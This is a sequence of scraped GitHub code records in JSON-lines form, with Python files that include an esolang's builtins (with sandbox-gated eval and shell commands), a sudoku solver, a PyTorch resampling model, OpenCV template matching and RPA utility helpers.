docs=\"Get the current hour\", stability=\"alpha\")\n cput('Epoch_hour', ['Eh'], [Case.value_r2v(lambda e: fts(e).hour )], docs=\"Get the hour from a timestamp\", stability=\"alpha\")\n cput('Now_twelve_hour', ['Ni'], [Case.void (lambda _: [(now().hour - 1) % 12 + 1 ])], docs=\"Get the current hour, as a number from 1 to 12\", stability=\"alpha\")\n cput('Epoch_twelve_hour', ['Ei'], [Case.value_r2v(lambda e: (fts(e).hour - 1) % 12 + 1 )], docs=\"Get the hour, as a number from 1 to 12 from a timestamp\", stability=\"alpha\")\n cput('Now_day_of_year', ['Nj'], [Case.void (lambda _: [ now().timetuple().tm_yday])], docs=\"Get the current day of year\", stability=\"alpha\") # type: ignore\n cput('Epoch_day_of_year', ['Ej'], [Case.value_r2v(lambda e: fts(e).timetuple().tm_yday )], docs=\"Get the day of year from a timestamp\", stability=\"alpha\") # type: ignore\n cput('Now_month', ['Nm'], [Case.void (lambda _: [ now().month ])], docs=\"Get the current month\", stability=\"alpha\")\n cput('Epoch_month', ['Em'], [Case.value_r2v(lambda e: fts(e).month )], docs=\"Get the month from a timestamp\", stability=\"alpha\")\n cput('Now_second', ['Ns'], [Case.void (lambda _: [ now().second ])], docs=\"Get the current second\", stability=\"alpha\")\n cput('Epoch_second', ['Es'], [Case.value_r2v(lambda e: fts(e).second )], docs=\"Get the second from a timestamp\", stability=\"alpha\")\n cput('Now_iso_weekday', ['Nu'], [Case.void (lambda _: [ now().isoweekday() ])], docs=\"Get the current ISO weekday (Monday is 1, Sunday is 7)\", stability=\"alpha\")\n cput('Epoch_iso_weekday', ['Eu'], [Case.value_r2v(lambda e: fts(e).isoweekday() )], docs=\"Get the ISO weekday (Monday is 1, Sunday is 7) from a timestamp\", stability=\"alpha\")\n cput('Now_weekday', ['Nw'], [Case.void (lambda _: [ now().weekday() ])], docs=\"Get the current weekday (Monday is 0, Sunday is 6)\", stability=\"alpha\")\n cput('Epoch_weekday', ['Ew'], [Case.value_r2v(lambda e: fts(e).weekday() )], docs=\"Get the weekday (Monday is 0, Sunday is 6) from a timestamp\", stability=\"alpha\")\n cput('Now_year', ['Ny'], [Case.void (lambda _: [ now().year ])], docs=\"Get the current year\", stability=\"alpha\")\n cput('Epoch_year', ['Ey'], [Case.value_r2v(lambda e: fts(e).year )], docs=\"Get the year from a timestamp\", stability=\"alpha\")\n # }}}\n # Randomness {{{\n cput('Random_float', ['Rf'], [Case.void(lambda env: [random.random()])],\n stability=\"alpha\")\n cput('Random_gaussian', ['Rg'], [\n Case.void(lambda env: [random.gauss(0, 1)])\n ],\n stability=\"alpha\")\n cput('Random_int', ['Ri'], [\n Case.number(lambda env, n: [random.randrange(num.intify(n))])\n ],\n stability=\"alpha\")\n cput('Random_choice', ['Rc'], [\n Case.seq(lambda env, seq: [random.choice(pd_deref(seq))])\n ],\n stability=\"alpha\")\n @put('Random_seed', stability=\"alpha\")\n def random_seed(env: Environment) -> None:\n e = env.pop()\n if isinstance(e, (Char, int, float)):\n random.seed(num.intify(e))\n elif isinstance(e, str):\n random.seed(e)\n else:\n raise AssertionError(\"Can't seed random with non-numeric non-string value \" + repr(e))\n # }}}\n # Regular expressions {{{\n cput('Regex_search', ['Xs'], [\n Case.value2(lambda env, s, regex: [match_to_pd(re.search(env.pd_str(regex), env.pd_str(s)))]),\n ],\n docs=\"\"\"Take a string and a regex, and perform a regex search\n through the string. Returns a list consisting of the string matched\n by the regex followed by all of the regex's groups, or an empty\n list if no match is found (so the truthiness of the result is\n whether a match is found).\"\"\",\n stability=\"unstable\")\n cput('Regex_match', ['Xm'], [\n Case.value2(lambda env, s, regex: [match_to_pd(re.fullmatch(env.pd_str(regex), env.pd_str(s)))]),\n ],\n docs=\"\"\"Take a string and a regex, and attempt to match the regex\n exactly against the entire string. Returns a list consisting of\n the string matched by the regex followed by all of the regex's\n groups, or an empty list if no match is found (so the truthiness of\n the result is whether a match is found).\"\"\",\n stability=\"unstable\")\n cput('Regex_array', ['Xa'], [\n Case.value2(lambda env, s, regex: [[match_to_pd(m) for m in re.finditer(env.pd_str(regex), env.pd_str(s))]]),\n ],\n docs=\"\"\"Take a string and a regex, and find all matches (this is\n Python's re.finditer, and its caveats apply.) Returns a list with\n one list for each match; each list consists of the string matched\n by the regex followed by all of the regex's groups.\"\"\",\n stability=\"unstable\")\n # }}}\n # Stack functions {{{\n @put('Pop_stack', ';s',\n stability=\"beta\")\n def pop_stack(env: Environment) -> None:\n env.pop_until_stack_marker()\n @put('Reverse_stack', 'Down_stack', 'Ds',\n stability=\"beta\")\n def reverse_stack(env: Environment) -> None:\n env.push(*env.pop_until_stack_marker()[::-1])\n @put('Length_stack', 'Ls',\n stability=\"beta\")\n def length_stack(env: Environment) -> None:\n env.push(len(env.pop_until_stack_marker()))\n @put('Sum_stack', 'Šs',\n stability=\"beta\")\n def sum_stack(env: Environment) -> None:\n env.push(pd_deep_sum(env.pop_until_stack_marker()))\n @put('Product_stack', 'Þs',\n stability=\"beta\")\n def product_stack(env: Environment) -> None:\n # TODO: make this a deepmap or something?\n env.push(pd_deep_product(env.pop_until_stack_marker()))\n @put('Force_stack', 'Fs',\n stability=\"alpha\")\n def force_stack(env: Environment) -> None:\n env.maximize_length()\n @put('Output_stack', 'Os',\n stability=\"beta\")\n def output_stack(env: Environment) -> None:\n print(env.pd_str(env.pop_until_stack_marker()), end=\"\")\n @put('Print_stack', 'Ps',\n stability=\"beta\")\n def print_stack(env: Environment) -> None:\n env.print_output_record(env.pd_str(env.pop_until_stack_marker()))\n # }}}\n # Bullet assignment {{{\n @put('Assign_bullet', '·', docs=\"Assign to the variable •\",\n stability=\"alpha\")\n def assign_bullet(env: Environment) -> None:\n e = env.pop()\n env.push(e)\n env.put(BULLET, e)\n @put('Assign_bullet_destructive', '–', docs=\"Pop and assign to the variable •\",\n stability=\"alpha\")\n def assign_bullet_destructive(env: Environment) -> None:\n e = env.pop()\n env.put(BULLET, e)\n # @put('Append_to_bullet', '©', docs=\"Pop and append to the variable •\",\n # stability=\"alpha\")\n # def append_to_bullet(env: Environment) -> None:\n # assign.append_func(env, BULLET)\n # @put('Retrieve_bullet', '®',\n # docs=\"\"\"Push the current value of the variable •, then reset that\n # variable to 0.\"\"\",\n # stability=\"alpha\")\n # def retrieve_bullet(env: Environment) -> None:\n # assign.retrieve_func(env, BULLET)\n # }}}\n # unsafe metacomputing {{{\n @put('Sleep', 'Sl', docs=\"Sleep for some number of seconds.\",\n stability=\"alpha\")\n def sleep(env: Environment) -> None:\n e = env.pop()\n assert isinstance(e, (Char, int, float))\n time.sleep(num.realify(e))\n\n if sandboxed:\n @put('Python', 'Py',\n docs=\"\"\"Evaluate arbitrary Python code. Push the result if\n non-None.\n\n Disabled in sandbox mode.\"\"\",\n stability=\"alpha\")\n def python_eval_disabled(env: Environment) -> None:\n raise Exception('Python eval disabled in sandbox mode')\n\n @put('Shell', 'Sh',\n docs=\"\"\"Evaluate shell code. If given a string, executes it\n through the shell; if given a list, executes the first element\n as the executable with the following elements of the list as\n arguments. Pushes the stdout of the subprocess.\n\n Disabled in sandbox mode.\"\"\",\n stability=\"alpha\")\n def shell_eval_disabled(env: Environment) -> None:\n raise Exception('Shell eval disabled in sandbox mode')\n else:\n\n @put('Python', 'Py',\n docs=\"\"\"Evaluate arbitrary Python code. Push the result if\n non-None. Unsafe!\"\"\",\n stability=\"alpha\")\n def python_eval(env: Environment) -> None:\n e = env.pop()\n res = eval(env.pd_str(e))\n if res is not None:\n env.push(res)\n\n @put('Shell', 'Sh',\n docs=\"\"\"Evaluate arbitrary shell code. Push the result if\n non-None. Unsafe!\"\"\",\n stability=\"alpha\")\n def shell_eval(env: Environment) -> None:\n import subprocess\n e = env.pop()\n if isinstance(e, list):\n proc = subprocess.Popen([env.pd_str(x) for x in e],\n stdout=subprocess.PIPE)\n elif isinstance(e, str):\n proc = subprocess.Popen(e, shell=True, stdout=subprocess.PIPE)\n else:\n raise Exception(\"Cannot evaluate non-list non-str as Shell\")\n env.push(proc.communicate()[0])\n\n # }}}\n env.lazy_var_triggers.append(arithmetic_literal_trigger)\n\n# vim:set tabstop=4 shiftwidth=4 expandtab fdm=marker:\n","repo_name":"betaveros/paradoc","sub_path":"paradoc/builtins/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":135760,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"40"} +{"seq_id":"6239498900","text":"#!/usr/bin/python\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport subprocess, time\n\nfrom six_mod.moves import xrange\n\nfor i in xrange(500):\n p = subprocess.Popen([\"python\", \"/home/pi/pi3d/demos/Minimal.py\"],\n stdin=subprocess.PIPE, stderr=subprocess.PIPE)\n time.sleep(7.0)\n stdoutdata, stderrdata = p.communicate(chr(27))\n with open(\"/home/pi/pi3d/experiments/minimal_count.txt\", \"w\") as myfile:\n myfile.write(str(i))\n\n\n","repo_name":"tipam/pi3d","sub_path":"experiments/RunMultipleMinimals.py","file_name":"RunMultipleMinimals.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"40"} +{"seq_id":"18415784047","text":"from board import *\n\n\ndef solve(board):\n \"\"\" Input: board- Board object\n\n A function using a recursive backtracking algorithm to solve a sudoku puzzle.\n Returns a boolean and prints the solved puzzle once it is found.\n \"\"\"\n position = board.getBlank() # get the next empty postion in the board\n\n # if there are no more empty positions, the puzzle has been solved; print the solution\n if position == None:\n print(\"Solution found:\")\n print()\n print(board)\n return True\n \n # loop through ints 1-9 and check if they are valid in the current empty position,\n # if yes place the value in the position and make a recursive call to fill the next\n # empty position\n for num in range(1, 10):\n if isValid(board, num, position[0], position[1]):\n board.placeValue(num, position[0], position[1])\n if solve(board) == True:\n return True\n board.removeValue(position[0], position[1])\n\n return False\n\n\ndef isValid(board, value, row, col):\n \"\"\" Inputs: board- Board object\n value- integer from 1-9 to be checked\n row- row index of the position to be checked\n col- column index of the position to be checked\n \n Outputs: a boolean indicating whether the given value can be placed in the \n specified position on the board based on whether the value is already in the \n position's row, column or inner box\n \"\"\"\n\n # check if the value is already in the row\n for c in range(len(board.cells[0])):\n if board.cells[row][c] == value:\n return False\n \n # check if the value is already in the column\n for r in range(len(board.cells)):\n if board.cells[r][col] == value:\n return False\n\n # check if the value is already in the inner 3x3 box the given position \n # lies in (position (row, col) falls in the inner box in the range of \n # rows from 3*(row // 3) to 3*(row // 3) + 3 - 1 and colums from 3*(col) // 3) to \n # 3*(row // 3) + 3 - 1)\n for r in range(3*(row // 3) , 3*(row // 3) + 3):\n for c in range(3*(col // 3), 3*(col // 3) + 3):\n if board.cells[r][c] == value:\n return False\n\n # if the value is not in the row, column or inner box, the position is valid\n return True\n\ndef main():\n \"\"\" main program execution loop function \"\"\"\n while True:\n try: \n rank = int(input(\"Enter a rank from 1-1000 (low end is easy, high end is hard): \"))\n except ValueError:\n print(\"Please enter an integer from 1-1000\")\n continue\n if rank < 1 or rank > 1000:\n print(\"Please enter an integer from 1-1000\")\n continue\n else:\n break\n \n board = Board(rank)\n print(\"Initial Board:\")\n print()\n print(board)\n\n while True:\n try:\n response = str(input(\"Find solution? (y/n): \"))\n except ValueError:\n print(\"Please respone 'y' or 'n'\")\n continue\n if response == \"y\":\n solve(board)\n break\n elif response == \"n\":\n break\n else:\n print(\"Please respond with 'y' or 'n'\")\n continue\n\nmain()","repo_name":"EMobilio/sudoku-solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73128643319","text":"import torch\nimport torch.nn as nn\nimport math\n\nLEAKY_FACTOR = 0.2\nRES_FACTOR = 1.0\ntorch.pi = torch.acos(torch.zeros(1)).item() * 2\n \nclass Downsampler(nn.Module):\n def __init__(self, ksize, scale, batch):\n super(Downsampler, self).__init__()\n self.ksize = ksize\n self.scale = scale\n self.batch = batch\n \n def softround(self, x, alpha=1.0):\n return x - alpha * (torch.sin( 2 * torch.pi * x ) / (2 * torch.pi))\n \n def batch_bli(self, im, x, y, channel_first=False, dtype=torch.FloatTensor, dtype_long=torch.LongTensor):\n num_points = x.shape[1]\n # Get four corner indicies\n x0 = torch.floor(x).type(dtype_long)\n x1 = x0 + 1\n y0 = torch.floor(y).type(dtype_long)\n y1 = y0 + 1\n # Clamp within h, w boundries\n x0 = torch.clamp(x0, 0, im.shape[2]-1)\n x1 = torch.clamp(x1, 0, im.shape[2]-1)\n y0 = torch.clamp(y0, 0, im.shape[1]-1)\n y1 = torch.clamp(y1, 0, im.shape[1]-1)\n # Get four corner pixel values\n Ia = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x0[b], y0[b])])\n Ib = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x0[b], y1[b])])\n Ic = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x1[b], y0[b])])\n Id = torch.cat([im[b, x, y, :] for b in range(self.batch) for x, y in zip(x1[b], y1[b])])\n # Define matricies\n scale = (1 / ( (x1-x0) * (y1-y0) ) ).flatten()\n m1 = torch.cat([ torch.sub(x1, x), torch.sub(x, x0)], dim=1).float()\n m2 = torch.stack([Ib, Ia, Id, Ic], dim=1).reshape(self.batch*num_points,2,2,3).float()\n m3 = torch.cat([ torch.sub(y1, y), torch.sub(y, y0) ], dim=1).float()\n # Reshape for batch matmul\n m1 = m1.reshape(self.batch*num_points,1,1,2).repeat(1,2,1,1)\n m3 = m3.reshape(self.batch*num_points,1,2,1)\n return scale[:,None] * torch.matmul( torch.matmul(m1, m2).permute(0,3,2,1), m3 ).flatten(start_dim=1)\n \n def forward(self, images, kernels, offsets_x, offsets_y, channel_first=False):\n # ensure channel last\n if channel_first:\n images = images.permute(0,2,3,1)\n self.batch = images.shape[0]\n h, w = images.shape[2]//self.scale, images.shape[3]//self.scale\n kernels = kernels.permute(0,2,3,1)\n offsets_x = offsets_x.permute(0,2,3,1)\n offsets_y = offsets_y.permute(0,2,3,1)\n u, v = torch.arange(h)+0.5*self.scale-0.5, torch.arange(w)+0.5*self.scale-0.5\n coords_x = torch.add(offsets_x, self.ksize/2)\n coords_x = torch.add(coords_x, torch.arange(3).reshape(3,1).repeat(1,3).flatten())\n coords_x = torch.add(coords_x, u.reshape(h,1).repeat(1,self.ksize**2))\n coords_y = torch.add(offsets_y, self.ksize/2)\n coords_y = torch.add(coords_y, torch.arange(3).repeat(3))\n coords_y = torch.add(coords_y, u.reshape(w,1).repeat(1,self.ksize**2))\n pix_hr = self.batch_bli(images.permute(0,2,3,1), coords_x.flatten(start_dim=1), coords_y.flatten(start_dim=1), self.batch)\n pix_hr = pix_hr.reshape(self.batch, h, w, self.ksize**2,3)\n pix_lr = torch.mul(kernels.unsqueeze(-1).repeat(1,1,1,1,3), pix_hr)\n out = torch.sum(pix_lr, axis=-2)\n return self.softround(out*255.0)\n \n\n\nclass MeanShift(nn.Conv2d):\n def __init__(self, rgb_range, rgb_mean=(0.5, 0.5, 0.5), rgb_std=(1.0, 1.0, 1.0), sign=-1):\n super(MeanShift, self).__init__(in_channels=3, out_channels=3, kernel_size=1)\n std = torch.Tensor(rgb_std)\n self.weight.data = torch.eye(3).view(3, 3, 1, 1) / std.view(3, 1, 1, 1)\n self.bias.data = sign * rgb_range * torch.Tensor(rgb_mean) / std\n for p in self.parameters():\n p.requires_grad = False\n \n \nclass PixelUnshuffle(nn.Module):\n def __init__(self, down_scale):\n super(PixelUnshuffle, self).__init__()\n if not isinstance(down_scale, int):\n raise ValueError('Down scale factor must be a integer number')\n self.down_scale = down_scale\n\n def forward(self, input):\n b, c, h, w = input.size()\n assert h % self.down_scale == 0\n assert w % self.down_scale == 0\n oc = c * self.down_scale ** 2\n oh = int(h / self.down_scale)\n ow = int(w / self.down_scale)\n output_reshaped = input.reshape(b, c, oh, self.down_scale, ow, self.down_scale)\n output = output_reshaped.permute(0, 1, 3, 5, 2, 4).reshape(b, oc, oh, ow)\n return output\n\n\nclass DownsampleBlock(nn.Module):\n def __init__(self, scale, in_channels, out_channels):\n super(DownsampleBlock, self).__init__()\n self.unshuffle = PixelUnshuffle(scale)\n self.conv = nn.Conv2d(in_channels*scale**2, out_channels, kernel_size=1, stride=1)\n \n def forward(self, x):\n x = self.unshuffle(x)\n x = self.conv(x)\n return x\n \n \nclass UpsampleBlock(nn.Module):\n def __init__(self, scale, in_channels, out_channels):\n super(UpsampleBlock, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels*scale**2, kernel_size=1, stride=1)\n self.shuffle = nn.PixelShuffle(scale)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.shuffle(x)\n return x\n\n \nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size):\n super(ResidualBlock, self).__init__()\n self.transform = nn.Sequential(\n nn.ReflectionPad2d(kernel_size//2),\n nn.Conv2d(in_channels, out_channels, kernel_size),\n nn.LeakyReLU(LEAKY_FACTOR),\n nn.ReflectionPad2d(kernel_size//2),\n nn.Conv2d(in_channels, out_channels, kernel_size)\n )\n \n def forward(self, x):\n return x + self.transform(x) * RES_FACTOR\n \n\nclass TrunkBlock(nn.Module):\n def __init__(self, upscale, in_channels, out_channels):\n super(TrunkBlock, self).__init__()\n self.transform = nn.Sequential(\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, kernel_size=3, stride=1),\n nn.ReLU(),\n UpsampleBlock(scale=(8//upscale), in_channels=256, out_channels=256),\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n \n def forward(self, x):\n x = self.transform(x)\n return x\n\n\nclass ResamplerNet(nn.Module):\n def __init__(self, rgb_range, res_blocks=5, kernel_size=(3,3)):\n super(ResamplerNet, self).__init__()\n \n self.meanshift = MeanShift(rgb_range)\n \n self.ds_1 = nn.Sequential(\n nn.ReflectionPad2d(2),\n nn.Conv2d(3, 64, kernel_size=(5,5), stride=1),\n nn.LeakyReLU(LEAKY_FACTOR)\n )\n \n self.ds_2 = DownsampleBlock(2, 64, 128)\n self.ds_4 = DownsampleBlock(2, 128, 128)\n res_4 = list()\n for idx in range(res_blocks):\n res_4 += [ResidualBlock(128, 128, 3)]\n self.res_4 = nn.Sequential(*res_4)\n self.ds_8 = DownsampleBlock(2, 128, 256)\n \n self.kernel_trunk = TrunkBlock(2, 256, 256)\n self.offset_trunk = TrunkBlock(2, 256, 256)\n \n self.kernel_prediction = nn.Sequential(\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, 3),\n nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, math.prod(kernel_size), 3)\n )\n \n self.offset_h_prediction = nn.Sequential(\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, 3),\n nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, math.prod(kernel_size), 3),\n nn.Tanh()\n )\n \n self.offset_v_prediction = nn.Sequential(\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, 256, 3),\n nn.ReLU(),\n nn.ReflectionPad2d(1),\n nn.Conv2d(256, math.prod(kernel_size), 3),\n nn.Tanh()\n )\n \n def forward(self, x):\n x = self.meanshift(x)\n x = self.ds_1(x)\n x = self.ds_2(x)\n x = self.ds_4(x)\n x = self.res_4(x)\n x = self.ds_8(x)\n \n kernels = self.kernel_trunk(x)\n kernels = torch.clamp(self.kernel_prediction(kernels), min=1e-6, max=1.0)\n kernels = kernels / torch.sum(kernels, dim=1, keepdim=True).clamp(min=1e-6)\n \n offsets = self.offset_trunk(x)\n offsets_h, offsets_v = self.offset_h_prediction(offsets), self.offset_v_prediction(offsets)\n \n return kernels, offsets_h, offsets_v\n \n ","repo_name":"garrett-partenza-us/openCAR","sub_path":"models/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":8916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35367932712","text":"import datetime\n\nfrom graphql import graphql_enum\nfrom graphql import graphql_field\nfrom graphql import graphql_input_object\nfrom graphql import graphql_object\nfrom graphql import graphql_root_field\n\n\n@graphql_object('TestTimeSpan')\nclass TestTimeSpan(object):\n \"\"\"Provides functionality pertaining to intervals of time.\"\"\"\n\n @staticmethod\n @graphql_root_field('testTimeSpan', 'TestTimeSpan!')\n def instance():\n \"\"\"Return an instance of TestTimeSpan.\"\"\"\n return TestTimeSpan()\n\n @staticmethod\n @graphql_enum('TimeUnit')\n def graphql_time_unit_enum():\n \"\"\"GraphQL enumeration for units of time.\"\"\"\n return {\n 'DAYS': 'days',\n 'SECONDS': 'seconds',\n 'WEEKS': 'weeks',\n }\n\n @staticmethod\n @graphql_input_object('Interval')\n def interval_input_type():\n \"\"\"Describe the input object type for intervals of time.\n\n return dict - A map from the names of\n the input object fields to their type strings.\n \"\"\"\n return {\n 'number': 'Float!',\n 'unit': 'TimeUnit!',\n }\n\n @graphql_field(\n 'timeSum', 'TimeSpan!',\n {'intervals': '[Interval!]', 'times': '[TimeSpan!]'})\n def add_times(self, times=[], intervals=[]):\n \"\"\"Return the sum of the specified intervals of time.\n\n list times - The timedeltas to include in the sum.\n list> - The intervals to include in the\n sum, formatted as suggested by the return value of\n interval_input_type().\n return timedelta - The sum.\n \"\"\"\n total = datetime.timedelta()\n for time in times:\n total += time\n for interval in intervals:\n if interval['unit'] == 'seconds':\n total += datetime.timedelta(seconds=interval['number'])\n elif interval['unit'] == 'days':\n total += datetime.timedelta(days=interval['number'])\n elif interval['unit'] == 'weeks':\n total += datetime.timedelta(weeks=interval['number'])\n return total\n","repo_name":"btrekkie/graphql","sub_path":"src/graphql/executor/test/scalar_descriptors/time_span.py","file_name":"time_span.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33694550957","text":"from Math import *\r\nfrom Physics import *\r\nfrom Others import *\r\nimport cv2\r\nimport os\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef MatchImageTemplateInOpencv2 (\r\n HayStackImg = '',\r\n NeddleImg = '', \r\n ImgReadMethod = cv2.IMREAD_UNCHANGED,\r\n MatchTemplateMethod = cv2.TM_CCOEFF_NORMED,\r\n ConfidenceThreshold = 0.7,\r\n RectangleColour = (0, 255, 0),\r\n RectanlgeLineType = cv2.LINE_4,\r\n RectangleThickness = 2,\r\n\r\n FrameName = 'frame',\r\n\r\n FoundMsg = None,\r\n NotFoundMsg = None\r\n) :\r\n \r\n haystack_img = cv2.imread(HayStackImg, ImgReadMethod)\r\n needle_img = cv2.imread(NeddleImg, ImgReadMethod)\r\n\r\n result = cv2.matchTemplate(haystack_img, needle_img, MatchTemplateMethod)\r\n\r\n threshold = ConfidenceThreshold\r\n\r\n locations = np.where(result >= threshold)\r\n\r\n locations = list(zip(*locations[::-1]))\r\n\r\n if locations :\r\n print(FoundMsg)\r\n\r\n needle_w = needle_img.shape[1]\r\n needle_h = needle_img.shape[0]\r\n\r\n line_colour = RectangleColour\r\n line_type = RectanlgeLineType\r\n\r\n for loc in locations :\r\n top_left = loc\r\n bottom_right = (top_left[0] + needle_w, top_left[1] + needle_h)\r\n\r\n cv2.rectangle(haystack_img, top_left, bottom_right, line_colour, thickness = RectangleThickness)\r\n\r\n cv2.imshow(FrameName, haystack_img)\r\n\r\n cv2.waitKey()\r\n\r\n else :\r\n print(NotFoundMsg)","repo_name":"HARSH-PYTHON-X/ComputerOPM","sub_path":"ComputerVision.py","file_name":"ComputerVision.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10509309150","text":"N, M = map(int, input().split())\nice_graph = [list(map(int, input())) for _ in range(N)]\nresult = 0\n\n\"\"\"\n연결된 0이 총 몇 개인지를 찾아야됨 \n들어가면서 체크해야할 것 \n1.방문했는가 \n2.0인지 1인지 \n3.0이면 탐색을 쭉 해서 0 탐색이 끝날 때까지 탐색 계속하고 결과값 하나 올리기\n4. 1일땐 딱히 할 거 없으므로 1 자체를 방문O로 사용 \n\"\"\"\n\n\ndef dfs(graph, x, y):\n if x < 0 or x > N-1 or y < 0 or y > M-1:\n return False\n # 만약 0이면 주변에 0이 없을 때까지 계속 0을 탐색 해야함\n # 방문한 0은 1로 변환시키기\n if graph[x][y] == 0:\n graph[x][y] = 1\n dfs(graph, x+1, y)\n dfs(graph, x, y+1)\n dfs(graph, x+1, y+1)\n return True\n return False\n\n\nfor i in range(N):\n for j in range(M):\n if dfs(ice_graph, i, j):\n result += 1\n\nprint(result)\n","repo_name":"yunyezl/algoitzman","sub_path":"nahee/DFS&BFS/실전3_음료수 얼려 먹기.py","file_name":"실전3_음료수 얼려 먹기.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"7314611261","text":"import time\nimport os\nimport tkinter\nimport tempfile\nimport uuid\nimport pyperclip\nfrom rpa.日志模块.log import output_log\n\n\ndef pop_up_prompt_box(msg, times):\n \"\"\"\n 弹出提示框\n :param msg: 弹出的信息\n :param times: 弹出的时间ms\n :return:\n \"\"\"\n logger = output_log()\n if not isinstance(times, int):\n logger.error('错误信息:时间类型错误')\n raise Exception('时间类型错误')\n msg_type = type(msg)\n try:\n root = tkinter.Tk()\n root.title('弹出提示框')\n root['width'] = 400\n root['height'] = 300\n root.register(False, False)\n rich_text = tkinter.Text(root, width=380)\n rich_text.place(x=10, y=10, width=380, height=380)\n rich_text.insert('0.9', f\"{msg}\")\n rich_text.insert('0.9', msg_type)\n root.after(times, root.destroy)\n root.mainloop()\n logger.info(f'弹出内容:{msg_type},{msg}')\n except Exception as e:\n logger.error(f'错误信息:{e}')\n raise e\n\n\ndef cmd_command(command):\n \"\"\"\n cmd命令行\n :param command: 命令\n :return: 结果\n \"\"\"\n logger = output_log()\n if not isinstance(command, str):\n logger.error('错误信息:输出参数类型错误')\n raise Exception('输入参数类型错误')\n try:\n re = os.popen(command)\n result = re.read()\n logger.info(f'输出为:{result}')\n return result\n except Exception as e:\n logger.error(f\"错误信息:e\")\n raise e\n\n\ndef print_log(msg, log_level):\n \"\"\"\n 打印日志\n :param msg: 输出信息\n :param log_level: 日志等级\n :return:\n \"\"\"\n logger = output_log()\n if log_level not in [\"debug\", \"info\", \"error\"]:\n logger.error('错误信息:日志类型错误')\n raise Exception('日志类型错误')\n try:\n if log_level == 'debug':\n logger.debug(msg)\n return\n elif log_level == 'info':\n logger.info(msg)\n return\n elif log_level == 'error':\n logger.error(msg)\n return\n\n except Exception as e:\n logger.error(f'错误信息:{e}')\n raise e\n\n\ndef wait_time(times):\n \"\"\"\n 等待时间\n :param times: 等待时间 s\n :return:\n \"\"\"\n logger = output_log()\n if not isinstance(times, int):\n logger.error(f'错误信息:输入类型错误')\n raise Exception('输入类型错误')\n logger.info(f\"process wait_time:等待时间为:{times}s\")\n time.sleep(times)\n return\n\n\ndef get_uuid():\n \"\"\"\n 获取uuid\n :return: 输出UUID\n \"\"\"\n logger = output_log()\n try:\n out_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, 'rpa')\n logger.info(f\"process get_uuid:{out_uuid}\")\n return out_uuid\n except Exception as e:\n logger.error(f'process get_uuid:错误信息为:{e}')\n raise e\n\n\ndef get_username():\n \"\"\"\n 获取用户名\n :return: 用户名\n \"\"\"\n logger = output_log()\n user_name = os.getlogin()\n logger.info(f\"process get_username:{user_name}\")\n return user_name\n\n\ndef temporary_file_directory():\n \"\"\"\n 获取临时文件夹目录\n :return: 输出临时文件夹目录\n \"\"\"\n logger = output_log()\n temp_directory = tempfile.gettempdir()\n logger.info(f'process temporary_file_directory:{temp_directory}')\n return temp_directory\n\n\nif __name__ == '__main__':\n # pop_up_prompt_box({\"ssf\":13}, 1230)\n # cmd_command('dir')\n # print_log('lkjhdasf', log_level='info')\n # wait_time(3)\n # get_uuid()\n # get_username()\n temporary_file_directory()\n","repo_name":"zhangxin-nb/practice","sub_path":"rpa/系统功能/常用系统功能.py","file_name":"常用系统功能.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16586914919","text":"import os\nfrom peewee import *\nfrom playhouse.db_url import connect\n\n\nclass Database:\n\n def __init__(self, db_tables):\n self.DEBUG = True\n self.DATABASE = self.set_database()\n self.db_tables = db_tables\n\n\n def set_database(self):\n if self.DEBUG:\n print('Using SQLite DB')\n return SqliteDatabase('find-covid.sqlite')\n else:\n print('Using Production DB')\n return connect(os.environ['DB_URL'])\n \n\n\n def initialize_tables(self):\n self.DATABASE.connect()\n self.DATABASE.create_tables(self.db_tables)\n self.DATABASE.close()\n","repo_name":"mitchellpottratz/find-covid","sub_path":"backend/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19260223471","text":"import re\nfrom telethon.tl import types\nfrom typing import List\n\ncompiled_re = re.compile('0x[a-fA-F0-9]{40}')\n\nCHAIN_SEARCH_TERMS = {\n 'eth': ['dexscreener.com/ethereum', 'dextools.io/app/ether/'],\n 'bsc': ['poocoin.app/tokens/', 